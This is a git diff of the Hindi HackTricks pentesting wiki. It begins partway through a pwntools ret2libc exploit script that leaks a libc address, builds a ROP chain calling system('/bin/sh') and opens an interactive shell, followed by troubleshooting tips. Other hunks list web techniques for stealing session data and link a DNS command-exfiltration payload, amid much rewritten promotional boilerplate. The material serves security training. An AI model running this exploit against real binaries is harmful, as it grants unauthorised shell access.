get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
|
||||
|
||||
|
||||
|
||||
#############################
|
||||
#### FINAL EXPLOITATION #####
|
||||
#############################
|
||||
|
||||
## Via One_gadget (https://github.com/david942j/one_gadget)
|
||||
# gem install one_gadget
|
||||
def get_one_gadgets(libc):
|
||||
import string, subprocess
|
||||
args = ["one_gadget", "-r"]
|
||||
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
|
||||
args += ["-b", libc.hex()]
|
||||
else:
|
||||
args += [libc]
|
||||
try:
|
||||
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
|
||||
except:
|
||||
print("One_gadget isn't installed")
|
||||
one_gadgets = []
|
||||
return
|
||||
|
||||
rop2 = b""
|
||||
if USE_ONE_GADGET:
|
||||
one_gadgets = get_one_gadgets(LIBC)
|
||||
if one_gadgets:
|
||||
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
|
||||
|
||||
## Normal/Long exploitation
|
||||
if not rop2:
|
||||
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
|
||||
SYSTEM = LIBC.sym["system"]
|
||||
EXIT = LIBC.sym["exit"]
|
||||
|
||||
log.info("POP_RDI %s " % hex(POP_RDI))
|
||||
log.info("bin/sh %s " % hex(BINSH))
|
||||
log.info("system %s " % hex(SYSTEM))
|
||||
log.info("exit %s " % hex(EXIT))
|
||||
|
||||
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
|
||||
rop2 = generate_payload_aligned(rop2)
|
||||
|
||||
|
||||
print(P.clean())
|
||||
P.sendline(rop2)
|
||||
|
||||
P.interactive() #Interact with your shell :)
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
# सामान्य समस्याएँ
|
||||
|
||||
## MAIN_PLT = elf.symbols\['main'] नहीं मिला
|
||||
|
||||
यदि "main" प्रतीक मौजूद नहीं है (संभावित रूप से इसलिए कि यह एक स्ट्रिप्ड बाइनरी है)। तो आप बस यहाँ मुख्य कोड कहाँ है देख सकते हैं:
|
||||
```python
|
||||
objdump -d vuln_binary | grep "\.text"
|
||||
Disassembly of section .text:
|
||||
0000000000401080 <.text>:
|
||||
```
|
||||
और पता मैन्युअल रूप से सेट करें:
|
||||
```python
|
||||
MAIN_PLT = 0x401080
|
||||
```
|
||||
## Puts नहीं मिला
|
||||
|
||||
यदि बाइनरी Puts का उपयोग नहीं कर रहा है तो आपको यह जांचनी चाहिए कि क्या यह इस्तेमाल कर रहा है
|
||||
|
||||
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
यदि आप इस **त्रुटि** को पाते हैं जब आप **सभी** एक्सप्लॉइट बनाने के बाद: `sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
तो कोशिश करें कि **"/bin/sh" के पते को 64 बाइट कम करें**:
|
||||
```python
|
||||
BINSH = next(libc.search("/bin/sh")) - 64
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
|
@ -1,37 +1,39 @@
|
|||
# वेब से संवेदनशील जानकारी की चोरी
|
||||
# वेब से संवेदनशील जानकारी फासवन
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
यदि कभी आपको एक **वेब पेज मिलता है जो आपके सत्र के आधार पर आपको संवेदनशील जानकारी प्रस्तुत करता है**: शायद यह कुकीज़ को प्रतिबिंबित कर रहा है, या प्रिंटिंग या CC विवरण या कोई अन्य संवेदनशील जानकारी, आप इसे चुराने का प्रयास कर सकते हैं।\
|
||||
यहाँ मैं आपको मुख्य तरीके प्रस्तुत करता हूँ जिनसे आप इसे हासिल करने का प्रयास कर सकते हैं:
|
||||
यदि किसी समय आपको एक **वेब पृष्ठ मिलता है जो आपकी सत्र पर आधारित संवेदनशील जानकारी प्रस्तुत करता है**: शायद यह कुकीज को प्रतिबिंबित कर रहा है, या डिटेल्स या किसी अन्य संवेदनशील जानकारी को प्रिंट कर रहा है, तो आप इसे चुरा सकते हैं।\
|
||||
यहाँ मैं आपको इसे प्राप्त करने की प्रमुख तरीके प्रस्तुत करता हूँ:
|
||||
|
||||
* [**CORS bypass**](pentesting-web/cors-bypass.md): यदि आप CORS हेडर्स को बायपास कर सकते हैं तो आप एक दुर्भावनापूर्ण पेज के लिए Ajax अनुरोध करके जानकारी चुरा सकते हैं।
|
||||
* [**XSS**](pentesting-web/xss-cross-site-scripting/): यदि आप पेज पर XSS भेद्यता पाते हैं तो आप इसका दुरुपयोग करके जानकारी चुरा सकते हैं।
|
||||
* [**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection/): यदि आप XSS टैग्स इंजेक्ट नहीं कर सकते हैं तो आप अन्य नियमित HTML टैग्स का उपयोग करके जानकारी चुरा सकते हैं।
|
||||
* [**Clickjaking**](pentesting-web/clickjacking.md): यदि इस हमले के खिलाफ कोई सुरक्षा नहीं है, तो आप उपयोगकर्ता को धोखा देकर संवेदनशील डेटा आपको भेजने के लिए मजबूर कर सकते हैं (एक उदाहरण [यहाँ](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))।
|
||||
* [**CORS बाईपास**](pentesting-web/cors-bypass.md): यदि आप CORS हेडर्स को बाईपास कर सकते हैं तो आप एक दुरुपयोगी पृष्ठ के लिए एजेक्स अनुरोध करके जानकारी चुरा सकते हैं।
|
||||
* [**XSS**](pentesting-web/xss-cross-site-scripting/): यदि आप पृष्ठ पर XSS दोष पाते हैं तो आप इसका दुरुपयोग करके जानकारी चुरा सकते हैं।
|
||||
* [**डैंगलिंग मार्कअप**](pentesting-web/dangling-markup-html-scriptless-injection/): यदि आप XSS टैग नहीं इंजेक्ट कर सकते हैं तो आप अन्य साधारण HTML टैग का उपयोग करके जानकारी चुरा सकते हैं।
|
||||
* [**क्लिकजैकिंग**](pentesting-web/clickjacking.md): यदि इस हमले के खिलाफ कोई सुरक्षा नहीं है, तो आप उपयोगकर्ता को धोखा देकर संवेदनशील डेटा भेजने में सक्षम हो सकते हैं (एक उदाहरण [यहाँ](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20))।
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
{% hint style="success" %}
|
||||
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**हैकट्रिक्स प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (एआरटीई)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**हैकट्रिक्स प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (जीआरटीई)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स **शेयर करें**.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो करें**.
|
||||
* [**हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,43 +1,29 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# मूल Payloads
|
||||
# मूल पेलोड
|
||||
|
||||
* **सरल सूची:** बस एक सूची जिसमें प्रत्येक पंक्ति में एक प्रविष्टि होती है
|
||||
* **रनटाइम फ़ाइल:** एक सूची जो रनटाइम में पढ़ी जाती है (मेमोरी में लोड नहीं होती)। बड़ी सूचियों का समर्थन करने के लिए।
|
||||
* **केस मॉडिफिकेशन:** स्ट्रिंग्स की एक सूची में कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचले केस में, ऊपरी केस में, प्रॉपर नाम - पहला अक्षर बड़ा और बाकी निचले केस में-, प्रॉपर नाम -पहला अक्षर बड़ा और बाकी वैसे ही रहते हैं-।
|
||||
* **संख्याएँ:** X से Y तक Z कदम या यादृच्छिक रूप से संख्याएँ उत्पन्न करें।
|
||||
* **ब्रूट फोर्सर:** अक्षर सेट, न्यूनतम और अधिकतम लंबाई।
|
||||
* **सरल सूची:** हर पंक्ति में एक प्रविष्टि वाली सूची
|
||||
* **रनटाइम फ़ाइल:** रनटाइम में पढ़ी गई सूची (मेमोरी में लोड नहीं की गई)। बड़ी सूचियों का समर्थन करने के लिए।
|
||||
* **केस संशोधन:** स्ट्रिंग की सूची पर कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचे, ऊपर, उचित नाम - पहले कैपिटलाइज़्ड और बाकी को निचे करना-, उचित नाम - पहले कैपिटलाइज़्ड और बाकी वैसा ही रहना-।
|
||||
* **नंबर्स:** X से Y तक नंबर उत्पन्न करें Z कदम या यादृच्छिक रूप से।
|
||||
* **ब्रूट फोर्सर:** वर्ण सेट, न्यूनतम और अधिकतम लंबाई।
|
||||
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : DNS अनुरोधों के माध्यम से कमांड्स को निष्पादित करने और आउटपुट प्राप्त करने के लिए Payload।
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : कमांड निष्पादित करने और आउटपुट को burpcollab के DNS अनुरोधों के माध्यम से पकड़ने के लिए पेलोड।
|
||||
|
||||
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
|
||||
|
||||
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,29 +1,35 @@
|
|||
# ईमेल सुरक्षा की कमियाँ
|
||||
# ईमेल सुरक्षा कमियाँ
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
|
||||
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
##
|
||||
|
||||
##
|
||||
##
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
|
||||
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,29 +1,30 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
